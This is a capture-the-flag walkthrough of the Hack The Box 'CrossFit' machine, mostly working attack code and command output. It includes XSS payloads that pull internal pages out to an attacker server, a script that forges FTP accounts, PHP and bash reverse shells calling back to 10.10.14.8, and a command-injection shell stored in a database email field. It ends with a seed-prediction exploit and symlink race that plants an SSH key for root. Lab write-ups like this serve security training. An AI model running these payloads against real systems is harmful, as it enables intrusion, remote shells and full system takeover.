Hack-The-Box-walkthrough[crossfit]

Introduction

OS: Linux
Difficulty: Insane
Points: 50
Release: 19 Sep 2020
IP: 10.10.10.208

User Blood haqpl 00 days, 15 hours, 52 mins, 14 seconds.
Root Blood haqpl 01 days, 00 hours, 25 mins, 20 seconds.


Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.208
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: Host: Cross; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

There is a default apache web server page.

I ran gobuster but found nothing interesting.

Anonymous FTP login is not allowed either.

So I run nmap again with the default scripts against port 21 only.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# nmap -sC -sV -p 21 -vvv 10.10.10.208
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.0.8 or later
| ssl-cert: Subject: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb
| Issuer: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-30T19:16:46
| Not valid after: 3991-08-16T19:16:46
| MD5: 557c 36e4 424b 381e eb17 708a 6138 bd0f
| SHA-1: 25ec d2fe 6c9d 7704 ec7d d792 8767 4bc3 8d0e cbce
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: Host: Cross

The TLS certificate on port 21 reveals a subdomain, gym-club.crossfit.htb, in its emailAddress field. Let’s add it to our /etc/hosts file.

nano /etc/hosts

10.10.10.208      gym-club.crossfit.htb

Let’s go to http://gym-club.crossfit.htb/.

After some enumeration I find a comment form on the blog page; let’s try something there.

First I capture the request in Burp and try various things, such as XSS.

I set both the User-Agent header and the comment field to a script tag that points at my Python SimpleHTTPServer.

http://gym-club.crossfit.htb/blog-single.php

<script src="http://10.10.14.8:8001/"></script>
POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.8:8001/"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1

name=lucifer11&email=1185151867%40qq.com&phone=17746608760&message=<script src="http://10.10.14.8:8001/"></script>&submit=submit
┌──(root💀kali)-[~]
└─# python -m SimpleHTTPServer 8001
Serving HTTP on 0.0.0.0 port 8001 ...
10.10.10.208 - - [28/Nov/2020 08:19:27] "GET / HTTP/1.1" 200 -

The script tag fires (the victim fetches my page), but nothing else I try leads anywhere, so I think about other routes and conclude that we need to attack ftp.crossfit.htb.

But the question is where that subdomain comes from.

After some trial and error I understand that we need to look from localhost: using the XSS, the victim’s browser can reach another vhost that only accepts requests from the local machine, and that host is ftp.crossfit.htb.

  • Create a HTTP Request in JS

With the help of this article I find a way to communicate with ftp.crossfit.htb.

So now we create a file called luci.js that fetches the ftp.crossfit.htb page and delivers its response to our Python server.

Let’s try this real quick.

Step 1

Create a file called luci.js

  • luci.js
// our server that receives the page, and the internal vhost to read
myhttpserver = 'http://10.10.14.8/'
targeturl = 'http://ftp.crossfit.htb/'

req = new XMLHttpRequest;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
        // response complete: send it base64-encoded as a path on our server
        req2 = new XMLHttpRequest;
        req2.open('GET', myhttpserver + btoa(this.responseText), false);
        req2.send();
    }
}
// synchronous GET from the victim's browser, which can reach the internal vhost
req.open('GET', targeturl, false);
req.send();

Step 2

Start a Python HTTP server in the working directory where luci.js lives.

python3 -m http.server 80

Now capture the comment-form request, send it to the Repeater tab, and set the User-Agent to the value below.

<script src="http://10.10.14.8/luci.js"></script>

Burp request:

POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.8/luci.js"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1

name=lucifer11&email=1185151867%40qq.com&phone=17746608760&message=%3Cscript%3E&submit=submit

Let’s send the request and check our python server.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [28/Nov/2020 08:45:54] "GET /luci.js HTTP/1.1" 200 -
10.10.10.208 - - [28/Nov/2020 08:45:55] code 404, message File not found
10.10.10.208 - - [28/Nov/2020 08:45:55] "GET /[base64 string elided] HTTP/1.1" 404 -

It gives us a base64 string.

Let’s decode it and see what’s inside.

<!DOCTYPE html>

<html>
<head>
<title>FTP Hosting - Account Management</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">
</head>
<body>

<br>
<div class="container">
<div class="row">
<div class="col-lg-12 margin-tb">
<div class="pull-left">
<h2>FTP Hosting - Account Management</h2>
</div>
<div class="pull-right">
<a class="btn btn-success" href="http://ftp.crossfit.htb/accounts/create"> Create New Account</a>
</div>
</div>
</div>


<table class="table table-bordered">
<tr>
<th>No</th>
<th>Username</th>
<th>Creation Date</th>
<th width="280px">Action</th>
</tr>


</table>



</div>

</body>
</html>

It’s the HTML of the ftp.crossfit.htb website.

If you’re not convinced, open it in a browser.

It’s an FTP Hosting - Account Management page.

Let’s create a new user.

But first, let’s check the URL behind the Create New Account button.

http://ftp.crossfit.htb/accounts/create

Let’s put this URL in luci.js and check how the page at ftp.crossfit.htb/accounts/create looks.

luci.js

// same script as before, now pointed at the account-creation page
myhttpserver = 'http://10.10.14.8/'
targeturl = 'http://ftp.crossfit.htb/accounts/create'

req = new XMLHttpRequest;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
        // response complete: send it base64-encoded as a path on our server
        req2 = new XMLHttpRequest;
        req2.open('GET', myhttpserver + btoa(this.responseText), false);
        req2.send();
    }
}
req.open('GET', targeturl, false);
req.send();

Let’s send the request again in burp.

And we got the response.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [28/Nov/2020 08:55:42] "GET /luci.js HTTP/1.1" 200 -
10.10.10.208 - - [28/Nov/2020 08:55:42] code 404, message File not found
10.10.10.208 - - [28/Nov/2020 08:55:42] "GET /[base64 string elided] HTTP/1.1" 404 -

Again, decode it and open it in a browser.

<!DOCTYPE html>

<html>
<head>
<title>FTP Hosting - Account Management</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">
</head>
<body>

<br>
<div class="container">

<div class="row">
<div class="col-lg-12 margin-tb">
<div class="pull-left">
<h2>Add New Account</h2>
</div>
<div class="pull-right">
<a class="btn btn-primary" href="http://ftp.crossfit.htb/accounts"> Back</a>
</div>
</div>
</div>


<form action="http://ftp.crossfit.htb/accounts" method="POST">
<input type="hidden" name="_token" value="BhmDZAiL7BCsMdnto9r0NyrUnrNWPpXYDMGlEmCO">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12">
<div class="form-group">
<strong>Username:</strong>
<input type="text" name="username" class="form-control" placeholder="Username">
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-12">
<div class="form-group">
<strong>Password:</strong>
<input type="password" name="pass" class="form-control" placeholder="Password">
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-12 text-center">
<button type="submit" class="btn btn-primary">Submit</button>
</div>
</div>

</form>

</div>

</body>
</html>

There are two fields, username and password.

The tricky part: if you look at the source, there is a hidden field called _token whose value changes dynamically, so a payload that registers a user has to first extract the _token value from the page.

After some trial and error I create a payload that registers a user.

createuser.js

myhttpserver = 'http://10.10.14.8'
targeturl = 'http://ftp.crossfit.htb/accounts/create'
username = 'luci'
password = 'lucifer11'

// fetch the create-account form; the response is also echoed back to our server
req = new XMLHttpRequest;
req.withCredentials = true;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
        req2 = new XMLHttpRequest;
        req2.open('GET', myhttpserver + btoa(this.responseText), false);
        req2.send();
    }
}
req.open('GET', targeturl, false);
req.send();

// pull the per-page _token out of the hidden input
regx = /token" value="(.*)"/g;
token = regx.exec(req.responseText)[1];

// submit the form with that token, reusing the same synchronous request object
var params = '_token=' + token + '&username=' + username + '&pass=' + password + '&submit=submit'
req.open('POST', "http://ftp.crossfit.htb/accounts", false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req.send(params);

Now send the request in Burp again, this time loading createuser.js:

<script src="http://10.10.14.8/createuser.js"></script>
POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.8/createuser.js"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1

name=lucifer11&email=1185151867%40qq.com&phone=17746608760&message=%3Cscript%3E&submit=submit

Let’s check the Python listener.

It receives the request:

10.10.10.208 - - [28/Nov/2020 09:05:09] "GET /createuser.js HTTP/1.1" 200 -

Then I use lftp to connect to the FTP service with the new account.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login luci
密码:
lftp luci@10.10.10.208:~> ls
drwxrwxr-x 2 33 1002 4096 Sep 21 09:45 development-test
drwxr-xr-x 13 0 0 4096 May 07 2020 ftp
drwxr-xr-x 9 0 0 4096 May 12 2020 gym-club
drwxr-xr-x 2 0 0 4096 May 01 2020 html
lftp luci@10.10.10.208:/>

We find another subdomain: development-test.crossfit.htb

Let’s add this to our /etc/hosts file.

If you look closely, the development-test directory is group-writable, so we have read and write access to it.

That means we can upload a PHP reverse shell and trigger it with a rev.js file.

Step 1

Create a file called rev.php.

rev.php

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/9988 0>&1'") ?>

Step 2

Create another file called rev.js that requests our rev.php.

rev.js

// loaded by the victim's browser via the XSS; it simply requests our uploaded
// rev.php on the internal vhost so the web server executes it
req = new XMLHttpRequest;
req.open('GET',"http://development-test.crossfit.htb/rev.php");
req.send();

Step 3

Start your Python server in the directory where all the files are, plus a netcat listener.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# ls
createuser.js luci.js rev.js rev.php
┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
┌──(root💀kali)-[~]
└─# nc -lvp 9988
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9988
Ncat: Listening on 0.0.0.0:9988

Step 4

Upload rev.php into the development-test directory over FTP.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login luci
密码:
lftp luci@10.10.10.208:~> ls
drwxrwxr-x 2 33 1002 4096 Sep 21 09:45 development-test
drwxr-xr-x 13 0 0 4096 May 07 2020 ftp
drwxr-xr-x 9 0 0 4096 May 12 2020 gym-club
drwxr-xr-x 2 0 0 4096 May 01 2020 html
lftp luci@10.10.10.208:/> cd development-test
lftp luci@10.10.10.208:/development-test> ls
lftp luci@10.10.10.208:/development-test> put rev.php
69 bytes transferred in 12 seconds (6 B/s)
lftp luci@10.10.10.208:/development-test> ls
-rw-r--r-- 1 1002 1002 69 Nov 28 14:30 rev.php

Step 5

Go to the Burp Repeater tab, change the script source to rev.js, and send it:

POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.8/rev.js"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1

name=dcasdc&email=casdcasdcd%40qq.com&phone=17746608760&message=%3Cscript%3E&submit=submit

Now let’s look at our netcat listener.

10.10.10.208 - - [28/Nov/2020 09:29:23] "GET /rev.js HTTP/1.1" 200 -
┌──(root💀kali)-[~]
└─# nc -lvp 9988
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9988
Ncat: Listening on 0.0.0.0:9988
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:37118.
id
bash: cannot set terminal process group (712): Inappropriate ioctl for device
bash: no job control in this shell
www-data@crossfit:/var/www/development-test$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@crossfit:/var/www/development-test$ whoami
whoami
www-data

Boom, we got a shell as www-data.

Now let’s run linPEAS.

  • LinPEAS - Linux Privilege Escalation Awesome Script
www-data@crossfit:/var/www/development-test$ ./linpeas.sh > info
./linpeas.sh > info
ls: cannot access '/etc/hosts.denied': No such file or directory
grep: write error: Broken pipe
www-data@crossfit:/var/www/development-test$

After analyzing the output I found two interesting things.

First, the crontabs.

They run a send_updates.php file, which looks suspicious.

MAILTO=""
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * isaac /usr/bin/php /home/isaac/send_updates/send_updates.php

Second, two hashes in the linPEAS result.

[+] Looking for specific hashes inside files - less false positives (limit 70)
/etc/ansible/playbooks/adduser_hank.yml:$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/
/var/www/ftp/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi

Let’s try to crack these hashes.

I save them in a file called hash.

hash

$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/
$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi

Let’s crack it with john.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Warning: only loading hashes of type "sha512crypt", but also saw type "bcrypt"
Use the "--format=bcrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
powerpuffgirls (?)
1g 0:00:00:05 DONE (2020-11-28 09:51) 0.1919g/s 4618p/s 4618c/s 4618C/s tajmahal..hunibuni
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We get the password powerpuffgirls.

This hash belongs to the user hank, as the /etc/ansible/playbooks/adduser_hank.yml path in the linPEAS result shows.

Let’s SSH in as hank and grab the user.txt flag.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# ssh hank@10.10.10.208
hank@10.10.10.208's password:
Linux crossfit 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Mon Sep 21 05:46:24 2020 from 10.10.14.2
hank@crossfit:~$ ls
user.txt
hank@crossfit:~$ cat user.txt
d6ce5237244a14992edde7f0b62b6076

Privilege escalation

Let’s check crontabs first.

hank@crossfit:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

MAILTO=""
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * isaac /usr/bin/php /home/isaac/send_updates/send_updates.php

There is the send_updates.php job we saw in the linPEAS result; it runs every minute as the user isaac.

Let’s check what’s inside send_updates.php.

hank@crossfit:~$ cat /home/isaac/send_updates/send_updates.php
<?php
/***************************************************
* Send email updates to users in the mailing list *
***************************************************/
require("vendor/autoload.php");
require("includes/functions.php");
require("includes/db.php");
require("includes/config.php");
use mikehaertl\shellcommand\Command;

if($conn)
{
    $fs_iterator = new FilesystemIterator($msg_dir);

    foreach ($fs_iterator as $file_info)
    {
        if($file_info->isFile())
        {
            $full_path = $file_info->getPathname();
            $res = $conn->query('SELECT email FROM users');
            while($row = $res->fetch_array(MYSQLI_ASSOC))
            {
                $command = new Command('/usr/bin/mail');
                $command->addArg('-s', 'CrossFit Club Newsletter', $escape=true);
                $command->addArg($row['email'], $escape=true);

                $msg = file_get_contents($full_path);
                $command->setStdIn('test');
                $command->execute();
            }
        }
        unlink($full_path);
    }
}

cleanup();
?>

The script hands every email address from the users table to /usr/bin/mail as a command-line argument. If the mikehaertl library does not properly protect what it reads from the database, we can pass it a command.

Looking at the library repository (the version is in the composer.json file), there is a relevant problem in issue #44:

  • escapeArgs option is not working properly

Now we need credentials: database access to inject the command into the users table so the PHP script reads and runs it, and FTP credentials to drop a file into the message directory the script iterates over, since it sends nothing unless a file exists there.

Earlier in my enumeration I had already seen the database credentials in /var/www/gym-club/db.php:

hank@crossfit:/home/isaac/send_updates$ cat /var/www/gym-club/db.php 
$dbhost = "localhost";
$dbuser = "crossfit";
$dbpass = "oeLoo~y2baeni";
$db = "crossfit";
$conn = new mysqli($dbhost, $dbuser, $dbpass, $db);
hank@crossfit:/home/isaac/send_updates$

Now we only need one more thing: FTP credentials.

I run linPEAS again and find an interesting file:

[+] Readable files belonging to root and readable by me but not world readable
-r--r----- 1 root hank 33 Nov 28 07:54 /home/hank/user.txt
-rw-r----- 1 root admins 384 Sep 27 2017 /etc/pam.d/chfn
-rw-r----- 1 root admins 92 Sep 27 2017 /etc/pam.d/newusers
-rw-r----- 1 root admins 119 Oct 9 2019 /etc/pam.d/vmtoolsd
-rw-r----- 1 root admins 1221 May 11 2020 /etc/pam.d/common-auth
-rw-r----- 1 root admins 4944 May 7 2020 /etc/pam.d/login
-rw-r----- 1 root admins 317 Jan 29 2020 /etc/pam.d/systemd-user
-rw-r----- 1 root admins 138 Jan 10 2019 /etc/pam.d/runuser-l
-rw-r----- 1 root admins 1208 May 11 2020 /etc/pam.d/common-account
-rw-r----- 1 root admins 319 May 1 2020 /etc/pam.d/vsftpd.orig
-rw-r----- 1 root admins 2256 May 11 2020 /etc/pam.d/su
-rw-r----- 1 root admins 647 May 12 2020 /etc/pam.d/vsftpd
-rw-r----- 1 root admins 137 Jan 10 2019 /etc/pam.d/su-l
-rw-r----- 1 root admins 90 May 7 2020 /etc/pam.d/chpasswd
-rw-r----- 1 root admins 1440 May 11 2020 /etc/pam.d/common-password
-rw-r----- 1 root admins 1154 May 11 2020 /etc/pam.d/common-session-noninteractive
-rw-r----- 1 root admins 2133 May 6 2020 /etc/pam.d/sshd
-rw-r----- 1 root admins 1189 May 11 2020 /etc/pam.d/common-session
-rw-r----- 1 root admins 520 Feb 14 2019 /etc/pam.d/other
-rw-r----- 1 root admins 580 May 7 2020 /etc/pam.d/chsh
-rw-r----- 1 root admins 92 Sep 27 2017 /etc/pam.d/passwd
-rw-r----- 1 root admins 606 Oct 11 2019 /etc/pam.d/cron
-rw-r----- 1 root admins 143 Jan 10 2019 /etc/pam.d/runuser

Let’s look at the contents of /etc/pam.d/vsftpd.

hank@crossfit:~$ cat /etc/pam.d/vsftpd
auth sufficient pam_mysql.so user=ftpadm passwd=8W)}gpRJvAmnb host=localhost db=ftphosting table=accounts usercolumn=username passwdcolumn=pass crypt=3
account sufficient pam_mysql.so user=ftpadm passwd=8W)}gpRJvAmnb host=localhost db=ftphosting table=accounts usercolumn=username passwdcolumn=pass crypt=3

# Standard behaviour for ftpd(8).
auth required pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed

# Note: vsftpd handles anonymous logins on its own. Do not enable pam_ftp.so.

# Standard pam includes
@include common-account
@include common-session
@include common-auth
auth required pam_shells.so

And there we find the FTP credentials:

user=ftpadm passwd=8W)}gpRJvAmnb

Without wasting time, let’s log in to FTP with these credentials.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login ftpadm
密码:
lftp ftpadm@10.10.10.208:~> ls
drwxrwx--- 2 1003 116 4096 Sep 21 10:19 messages
lftp ftpadm@10.10.10.208:/> cd messages
lftp ftpadm@10.10.10.208:/messages> ls
lftp ftpadm@10.10.10.208:/messages>

There is one directory, messages, with nothing inside. Let’s upload the rev.php we created earlier, this time calling back to port 9001.

rev.php

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# cat rev.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'") ?>
lftp ftpadm@10.10.10.208:/messages> ls
lftp ftpadm@10.10.10.208:/messages> put rev.php
69 bytes transferred in 9 seconds (8 B/s)
lftp ftpadm@10.10.10.208:/messages> ls
-rw-r--r-- 1 1003 1004 69 Nov 28 15:35 rev.php

Let’s log in to the MySQL database with the crossfit credentials.

hank@crossfit:~$ mysql -h localhost -ucrossfit -poeLoo~y2baeni
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 2613
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| crossfit |
| information_schema |
+--------------------+
2 rows in set (0.000 sec)

There is one database, crossfit; inside it is a users table with no rows. Let’s insert our reverse shell as an email address.

Before inserting into the users table, start your netcat listener on port 9001.

MariaDB [crossfit]> insert into users (id, email) values (9001, "-E $(bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1')");
Query OK, 1 row affected (0.001 sec)

MariaDB [crossfit]> select * from users;
+------+----------------------------------------------------------+
| id | email |
+------+----------------------------------------------------------+
| 9001 | -E $(bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1') |
+------+----------------------------------------------------------+
1 row in set (0.000 sec)

MariaDB [crossfit]>

After 10-15 seconds you get your reverse shell.

┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:43934.
bash: cannot set terminal process group (27903): Inappropriate ioctl for device
bash: no job control in this shell
isaac@crossfit:~$ id
id
uid=1000(isaac) gid=1000(isaac) groups=1000(isaac),50(staff),116(ftp),1005(admins)
isaac@crossfit:~$ whoami
whoami
isaac

Boom, we got a shell as isaac.

Now let’s run pspy to see which processes are running on the box.

  • pspy64

Transfer pspy64 to the box and run it:

hank@crossfit:~$ ./pspy64 -f

2020/11/28 11:31:01 FS: CLOSE_NOWRITE | /usr/bin/dbmsg

There is a program called dbmsg that runs every minute.

It’s a binary, so we can’t just cat it; we need to analyze it in Ghidra, so let’s transfer it to our local machine.

I use nc to transfer the file.

hank@crossfit:~$ nc 10.10.14.8 9002 < /usr/bin/dbmsg
┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# nc -lvp 9002 > dbmsg
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:58104.

Now let’s analyze it in Ghidra.

  • ghidra

The main function:

void main(void)

{
    __uid_t _Var1;
    time_t tVar2;

    _Var1 = geteuid();
    if (_Var1 != 0) {
        fwrite("This program must be run as root.\n",1,0x22,stderr);
        /* WARNING: Subroutine does not return */
        exit(1);
    }
    tVar2 = time((time_t *)0x0);
    srand((uint)tVar2);
    process_data();
    /* WARNING: Subroutine does not return */
    exit(0);
}

After analyzing the program I understand the following.

The dbmsg program runs every minute and seeds its random number generator with the remote machine’s current time. So we can write a C program that, run in the same second as dbmsg, produces the same random number. It should be written in C because the binary uses the GNU libc (glibc) random number generator, and our program has to call the same system library to reproduce the sequence.

Let’s write the little program, in other words the exploit:

exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* Seed exactly like dbmsg's main(): srand() with the current second, then
 * print the first rand() value.  Run in the same second against the same
 * glibc, this yields the number dbmsg is about to use.  No trailing newline,
 * so the output can be embedded directly in a shell command substitution. */
int main(void)
{
    srand(time(0));
    printf("%d", rand());

    return 0;
}

Let’s compile the exploit.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# gcc exploit.c -o exploit
ls -al | grep exploit
-rwxr-xr-x 1 root root 16736 11月 28 11:44 exploit
-rw-r--r-- 1 root root 147 11月 28 11:43 exploit.c

Now let’s create an SSH key pair:

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# ssh-keygen -t ed25519 -f id_rsa
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:JKM0G1B6lxUQmO715Pq2UBdJoOe9QJjfmeU7tYIwdl4 root@kali
The key's randomart image is:
+--[ED25519 256]--+
| ...ooo+o. |
| oo * . . |
| ..= O + o . |
| o.*.O.o * |
| .o. +S B E . |
| . ooB + o . |
| .. + + . |
| ... o |
| oo. |
+----[SHA256]-----+
┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# la -la | grep id_
-rw------- 1 root root 399 11月 28 11:45 id_rsa
-rw-r--r-- 1 root root 91 11月 28 11:45 id_rsa.pub

Now create one more file, root.sh, to automate the process.

Replace the public key with your own.

root.sh

# make the compiled seed predictor executable
chmod +x exploit
# row 1 of messages carries the parts of an ed25519 authorized_keys entry for dbmsg to pick up; swap in your own id_rsa.pub
mysql -h localhost -u crossfit -poeLoo~y2baeni -Dcrossfit -e'insert into messages (id, name, email, message) values (1, "ssh-ed25519", "root@kali", "AAAAC3NzaC1lZDI1NTE5AAAAIBpM8dQcTJXzXOsciQU22F4qpf1jv/SscvQAu+kz7np1");'
# race dbmsg: keep planting a symlink in /var/local named md5(rand() followed by the row id 1), so the file dbmsg writes as root lands in /root/.ssh/authorized_keys
while true; do ln -s /root/.ssh/authorized_keys /var/local/$(echo -n $(./exploit)1 | md5sum | cut -d " " -f 1) 2>/dev/null; done

Now transfer both files into /home/isaac/:

isaac@crossfit:~$ wget http://10.10.14.8/exploit
wget http://10.10.14.8/exploit
--2020-11-28 11:57:19-- http://10.10.14.8/exploit
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16736 (16K) [application/octet-stream]
Saving to: ‘exploit’

0K .......... ...... 100% 51.9K=0.3s

2020-11-28 11:57:23 (51.9 KB/s) - ‘exploit’ saved [16736/16736]

isaac@crossfit:~$ wget http://10.10.14.8/root.sh
wget http://10.10.14.8/root.sh
--2020-11-28 11:58:11-- http://10.10.14.8/root.sh
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 369 [text/x-sh]
Saving to: ‘root.sh’

0K 100% 60.4M=0s

2020-11-28 11:58:12 (60.4 MB/s) - ‘root.sh’ saved [369/369]

isaac@crossfit:~$ ls -la
ls -la
total 68
